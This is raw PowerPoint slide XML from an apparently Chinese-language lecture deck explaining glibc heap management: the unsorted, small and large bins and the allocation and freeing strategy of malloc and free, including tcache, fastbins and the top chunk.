            <a:off x="2643433" y="1539822"/>
            <a:ext cx="2838854" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>unsorted bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F3F1C11-1C60-41DD-A4C0-E6D71CCFBACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3105835"/>
            <a:ext cx="6096000" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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bins[1] </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管理刚刚释放还为分类的 chunk </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可以视为空闲 chunk 回归其所属 bin 之前的缓冲区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302F5155-CCDA-4138-8E71-BE515062945D}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228603087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pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EDE1F8-41AC-4DC1-8858-1FFD79A3509F}"/>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384274" y="1047564"/>
            <a:ext cx="2509051" cy="528221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C69B62FF-E40C-40B3-8800-1FBB9C991D2B}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165344349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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8157E90F-0267-4022-B321-62FA4C046419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1770962" y="1264613"/>
            <a:ext cx="2255746" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>small bins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6FAAC94-2F4B-4101-8795-63C98FF9521E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657383" y="2452430"/>
            <a:ext cx="6096000" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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bins[2] ~ bins[63] </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62 个循环双向链表 </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FIFO </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管理 16、24、32、40、 …… 、504 Bytes 的 free chunks（32位下） </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每个链表中存储的 chunk 大小都一致</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C51E43A-4C23-4FED-ADC5-804EF0409CBF}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111480086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pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772839B9-CBD0-4DCC-B02A-F3EEEB3A75DF}"/>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922015" y="1305017"/>
            <a:ext cx="8347969" cy="467208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416DEC51-BC3A-4C5B-9916-F4D64FB0610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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123296918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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5B274E-E36B-4EBA-86E1-5EA5962B67EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857984" y="1898496"/>
            <a:ext cx="2213683" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>large bins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D2B144C-D0C6-4E1B-92DA-5ADBF4C9050C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2993994"/>
            <a:ext cx="6096000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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bins[64] ~ bins[126] </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63 个循环双向链表 </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FIFO </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管理大于 504 Bytes 的 free chunks（32位下）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C393F144-696B-4A1D-BFF1-485A10227B4B}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371854902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pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60D632D3-CF1D-47B9-B3C1-57A9226577CC}"/>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260846" y="1340528"/>
            <a:ext cx="7670307" cy="468741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E0A9E235-3D83-4540-A4BE-A6FDDAFF3228}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348545768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4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84B8FCB-0BFE-46D0-8AAB-9C8149CE69CD}"/>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堆分配策略</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0BCD27FF-FF99-4018-9FD7-EB6A7EDBE3D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2274838"/>
            <a:ext cx="6096000" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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它根据用户申请的内存块大小以及相应大小 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通常使用的频度（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> chunk, small chunk, large chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>），依次实现了不同的分配方法。</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它由小到大依次检查不同的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中是否有相应的空闲块可以满足用户请求的内存。</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当所有的空闲 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>都无法满足时，它会考虑 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>top chunk</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当 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>top chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>也无法满足时，堆分配器才会进行内存块申请。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" i="0" dirty="0">
              <a:effectLst/>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20C074A4-3B2E-4B4C-801F-36747A181627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677254" y="1161649"/>
            <a:ext cx="1548822" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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74975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4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84B8FCB-0BFE-46D0-8AAB-9C8149CE69CD}"/>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堆分配策略</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20C074A4-3B2E-4B4C-801F-36747A181627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677254" y="1161649"/>
            <a:ext cx="1001813" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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61271867-D3AA-4615-93FE-9110E7A18FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2274838"/>
            <a:ext cx="6096000" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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它将用户暂且不用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>回收给堆管理器，适当的时候还会归还给操作系统。</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它依据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>大小来优先试图将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>链入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>tcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fast bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。不满足则链入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>usorted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中。</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在条件满足时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数遍历</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>usorted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>并将其中的物理相邻的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>合并，将相应大小的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>分类放入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>small bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>large bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中。</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除了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>tcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> chunk</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fast bin chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</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free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时会与其物理相邻的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>合并</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" i="0" dirty="0">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463280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4490C488-4A79-4D5B-8F05-235A9DD4A0FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="5935151" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
